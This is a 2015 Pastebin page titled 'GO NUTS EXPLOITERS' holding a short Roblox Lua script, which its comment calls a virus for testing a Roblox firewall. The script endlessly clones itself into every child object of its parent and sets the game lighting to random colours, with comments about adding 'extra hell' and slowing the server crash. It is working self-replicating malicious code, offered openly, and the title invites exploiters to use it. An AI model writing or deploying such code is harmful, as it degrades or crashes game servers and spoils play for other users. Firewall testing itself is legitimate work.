TheRealEprent

GO NUTS EXPLOITERS

Mar 21st, 2015
278
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.40 KB | None | 0 0
  1. -- An virus to test my ROBLOX firewall.
  2.  
  3. function reproduce()
  4.     local newPar=script:Clone()
  5.     return newPar
  6. end
  7.  
  8. wait(5) -- Keep things slow at first
  9.  
  10. while wait() do
  11.     for _,v in pairs(script.Parent:GetChildren()) do
  12.         reproduce().Parent=v
  13.         game.Lighting.Ambient=BrickColor.Random().Color -- For extra hell
  14.         wait(.5) -- Once again, we don't want the server instantly crashing
  15.     end
  16. end
Advertisement
Add Comment
Please, Sign In to add comment